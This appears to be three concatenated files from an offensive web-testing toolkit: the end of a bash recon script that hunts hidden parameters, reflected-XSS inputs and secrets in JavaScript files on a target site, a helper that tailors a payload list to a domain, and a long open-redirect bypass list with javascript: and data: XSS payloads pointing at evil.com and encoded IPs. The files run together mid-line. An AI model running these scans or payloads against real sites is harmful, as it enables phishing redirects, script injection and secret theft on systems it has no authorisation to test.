cat "$output_dir/ext_endpoints.txt" | uro > "$output_dir/arjun_ext-endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 13: Find Hidden Parameters on Passive Ext-Endpoints with Arjun
echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..."
arjun -i "$output_dir/arjun_ext-endpoints.txt" -oT "$output_dir/arjun_result_ext_endpoints.txt"
cat "$output_dir/arjun_result_ext_endpoints.txt" | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee "$output_dir/arjun-xss.txt"
cat "$output_dir/arjun-xss.txt" | kxss | tee "$output_dir/kxss-result.txt"
cat "$output_dir/arjun-xss.txt" | Gxss -p '">asad<hacked' | tee "$output_dir/Gxss-result.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 14: Crawling for targeted parameter wordlists
echo -e "Targeted Parameter wordlists for Parameter Fuzzing with x8 on All Endpoints..."
fallparams -u "$website_url" -crawl 5 -headless && cat parameters.txt | tee "$output_dir/parameters.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 15: x8 Find Hidden Parameters on Passive Ext-Endpoints with targeted parameter wordlists
echo -e "Running x8 to find Ext-Endpoints for Find Hidden Parameters with targeted parameter wordlists..."
x8 -u "$output_dir/arjun_ext-endpoints.txt" -w "$output_dir/parameters.txt" -X GET -o "$output_dir/x8-result.txt"
cat "$output_dir/x8-result.txt" | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee "$output_dir/x8-xss.txt"
cat "$output_dir/x8-xss.txt" | kxss | tee -a "$output_dir/kxss-result.txt"
cat "$output_dir/x8-xss.txt" | Gxss -p '">asad<hacked' | tee -a "$output_dir/Gxss-result.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find with x8: x8_xss.txt...\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find with Arjun: arjun_xss.txt...\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find KXSS: kxss-result.txt...\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find KXSS: Gxss-result.txtt...\n"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Step 16: Endpoint discovery using JS-Files
echo -e "Enpoitnt discovery using JS-Files..."
echo "$website_url" | subjs | python3 /home/kali/tools/JSA/jsa.py | tee "$output_dir/js_endpoints.txt"
cat "$output_dir/all_endpoints.txt"| grep '.js$' | tee "$output_dir/js_files.txt"
cat "$output_dir/js_files.txt" | while read url; do secretfinder -i $url -o cli >> "$output_dir/js_secrets.txt"; done
cat "$output_dir/js_files.txt" | python3 /home/kali/tools/JSA/jsa.py | tee -a "$output_dir/js_endpoints.txt"
linkfinder -i "$website_url" -d -o cli | tee -a "$output_dir/js_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Notify me that all tasks are complete
echo -e "${REDCOLOR} - All tasks are complete...\n"#!/usr/bin/env bash
#If terminal add collors
if [[ -t 1 ]]; then
#Colors
red='\e[0;31m'
green='\e[0;32m'
blue='\e[0;36m'
yellow='\e[0;33m'
errorredline='\e[0;41m'
greenbgblacktext='\e[30;48;5;82m'
NC='\e[0m'
else
#NoColors
red=''
green=''
blue=''
yellow=''
errorredline=''
greenbgblacktext=''
NC=''
fi
WHITELISTEDDOMAIN="$1"
function PRINT_CORRECT_USAGE_EXAMPLE () {
echo -e "$0 www.whitelisteddomain.pw\n"
echo -e "${green}$0 www.google.com\n${NC}"
echo -e "${blue}$0 app.domain.com\n${NC}"
}
function CHECK_PREVIOUS_CMD () {
if [ $? -ne 0 ]; then
echo -e "${errorredline}Build error${NC}"
echo -e "${red}$0 script error at line: $1 ${NC}"
echo -e "${yellow}View the last log above.${NC}"
exit 1
fi
}
function MAKE_REDIRECT_PAYLOADS () {
sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".tmp
CHECK_PREVIOUS_CMD $LINENO
sed 's/@www.whitelisteddomain.tld/@'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".tmp > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
CHECK_PREVIOUS_CMD $LINENO
echo "$WHITELISTEDDOMAIN" | awk -F\. '{print "//not"$(NF-1) FS $NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
CHECK_PREVIOUS_CMD $LINENO
echo "$WHITELISTEDDOMAIN" | awk -F\. '{print "http://not"$(NF-1) FS $NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
CHECK_PREVIOUS_CMD $LINENO
echo "$WHITELISTEDDOMAIN" | awk -F. '{print "http://"$0"."$NF"/"}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
rm -f Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".tmp
echo -e "\n${greenbgblacktext}Done.${NC} Filename: $(pwd)/Open-Redirect-payloads-burp-$WHITELISTEDDOMAIN.txt"
}
if [ $# -eq 0 ] || [ $# -gt 1 ] || [ $# -lt 1 ]; then
echo -e "${NC}"
echo -e "${red}Invalid number of arguments. Usage:\n${NC}"
PRINT_CORRECT_USAGE_EXAMPLE
exit 1
else
MAKE_REDIRECT_PAYLOADS
fihttps://evil.com
http%3A%2F%2Fwww.google.com
https%3A%2F%2Fwww.google.com%2F
https://www%2Egoogle%2Ecom
https://www%252Egoogle%252Ecom
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
%68%74%74%70%3a%2f%2fevil.com
%40evil.com/
%2F%2Fevil.com
%2F%2F%2F%2Fhackerone.com
//evil.com
///evil.com/
////evil.com
/\evil.com/
\\evil.com\
/..//evil.com
http:///evil.com/
@www.bing.com
.evil.com
https:evil.com
https;evil.com
https:\/\/evil.com
https:/\/\evil.com
https:\\evil.com
https://example.com%5C%5C@google.com/
https://evil.com%5C%40www.example.com
https://www.whitelisteddomain.tld@evil.com/
https://www.whitelisteddomain.tld/@evil.com
https://evil.com\@www.whitelisteddomain.tld
https://www.whitelisteddomain.tld.bing.com/
https://www.whitelisteddomain.tld/%0d/evil.com/
https://evil.com\\.www.whitelisteddomain.tld/
https://evil.com%E3%80%82%23.www.whitelisteddomain.tld/
https://www.whitelisteddomain.tld%00https://evil.com/
https://www.whitelisteddomain.tld/http://evil.com/
http://evil.com?vimeocdn.com/
https://bing.com?link=https://www.whitelisteddomain.tld/
https:/www.whitelisteddomain.tld/login-redirect/?redirect=//evil.com
<>//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///\;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
\/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
%01https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
%01https://google.com
////%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%09/google.com
///%09/google.com
//%09/google.com
/%09/google.com
/%09/javascript:alert(1);
/%09/javascript:alert(1)
////%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%09/www.whitelisteddomain.tld@google.com
///%09/www.whitelisteddomain.tld@google.com
//%09/www.whitelisteddomain.tld@google.com
/%09/www.whitelisteddomain.tld@google.com
&%0d%0a1Location:https://google.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
%2f216.58.214.206//
%2f216.58.214.206
%2f216.58.214.206%2f%2f
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
%2f$2f216.58.214.206
$2f%2f216.58.214.206%2f%2f
%2f$2f3627734734
$2f%2f3627734734%2f%2f
//%2f%2fgoogle.com
/%2f%2fgoogle.com
$2f%2fgoogle.com
%2f$2fgoogle.com
$2f%2fgoogle.com%2f%2f
%2f3627734734//
%2f3627734734
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com//
%2fgoogle.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@google.com/
//3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@google.com/
////%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%5cgoogle.com
///%5cgoogle.com
//%5cgoogle.com
/%5cgoogle.com
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
////%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%5cwww.whitelisteddomain.tld@google.com
///%5cwww.whitelisteddomain.tld@google.com
//%5cwww.whitelisteddomain.tld@google.com
/%5cwww.whitelisteddomain.tld@google.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
";alert(0);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
//google%00.com
/\google%252ecom
google%252ecom
<>//google.com
/<>//google.com
//;@google.com
///;@google.com
/////google.com/
/////google.com
////\;@google.com
////google.com//
////google.com/
////google.com
///\;@google.com
///google.com//
///google.com/
///google.com
//\/google.com/
//\google.com
//google.com//
//google.com/
//google.com
/.google.com
/\/\/google.com/
/\/google.com/
/\/google.com
/\google.com
/〱google.com
/google.com
../google.com
.google.com
@google.com
\/\/google.com/
〱google.com
google.com
google.com%23@www.whitelisteddomain.tld
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F..
/google.com/%2F..
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:80?@www.whitelisteddomain.tld/
//google.com:80#@www.whitelisteddomain.tld/
google.com/.jpg
//google.com\twww.whitelisteddomain.tld/
//google.com/www.whitelisteddomain.tld
//google.com\@www.whitelisteddomain.tld
google.com/www.whitelisteddomain.tld
//google%E3%80%82com
/http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:%0a%0dgoogle.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::216.58.214.206]
http:[::216.58.214.206]
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.www.whitelisteddomain.tld/
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.www.whitelisteddomain.tld/
http://3627734734
http:3627734734
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.www.whitelisteddomain.tld/
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld@google.com/
http://3H6k7lIAiqjfNeN@www.whitelisteddomain.tld+@google.com/
http://472.314.470.462
http:472.314.470.462
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.www.whitelisteddomain.tld/
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@www.whitelisteddomain.tld/
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@www.whitelisteddomain.tld/
http://[::ffff:216.58.214.206]
http:[::ffff:216.58.214.206]
/http://google.com
/http:/google.com
http://;@google.com
http://.google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
http://google.com%23.www.whitelisteddomain.tld/
http://google.com%2f%2f.www.whitelisteddomain.tld/
http://google.com%3F.www.whitelisteddomain.tld/
http://google.com%5c%5c.www.whitelisteddomain.tld/
http://google.com:80?@www.whitelisteddomain.tld/
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com\twww.whitelisteddomain.tld/
//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https://%09/google.com
https://%09/google.com
https://%09/www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%09/www.whitelisteddomain.tld@google.com
https://%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%0a%0dgoogle.com
//https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
/https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https%3a%2f%2fgoogle.com%2f
/https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/https://%5cgoogle.com
/https:/%5cgoogle.com/
https://%5cgoogle.com
https:/%5cgoogle.com/
/https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%5cwww.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https://%5cwww.whitelisteddomain.tld@google.com
https://%5cwww.whitelisteddomain.tld@google.com
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://google.com//
/https://google.com//
/https://google.com/
/https://google.com
/https:google.com
https://////google.com
https://google.com//
https://google.com/
https://google.com
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@www.whitelisteddomain.tld
https://google.com?www.whitelisteddomain.tld
https://google.com/www.whitelisteddomain.tld
https://google.com\www.whitelisteddomain.tld
https://google.com#www.whitelisteddomain.tld
https://google%E3%80%82com
//https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://:@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@www.whitelisteddomain.tld
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/www.whitelisteddomain.tld
https://www.whitelisteddomain.tld;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
/https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https:///www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https://www.whitelisteddomain.tld@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//https://www.whitelisteddomain.tld@google.com//
/https://www.whitelisteddomain.tld@google.com/
https://www.whitelisteddomain.tld;@google.com
https://www.whitelisteddomain.tld.google.com
https://www.whitelisteddomain.tld@google.com//
https://www.whitelisteddomain.tld@google.com/
https://www.whitelisteddomain.tld@google.com
/https://www.whitelisteddomain.tld@google.com/%2e%2e
https:///www.whitelisteddomain.tld@google.com/%2e%2e
//https://www.whitelisteddomain.tld@google.com/%2e%2e%2f
https://www.whitelisteddomain.tld@google.com/%2e%2e%2f
/https://www.whitelisteddomain.tld@google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https:///www.whitelisteddomain.tld@google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@google.com/%2f%2e%2e
https:///www.whitelisteddomain.tld@google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@google.com/%2f.//www.whitelisteddomain.tld@google.com/%2f..
https://www.whitelisteddomain.tld/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://www.whitelisteddomain.tld/https://google.com/
@https://www.google.com
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twww.whitelisteddomain.tld/
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
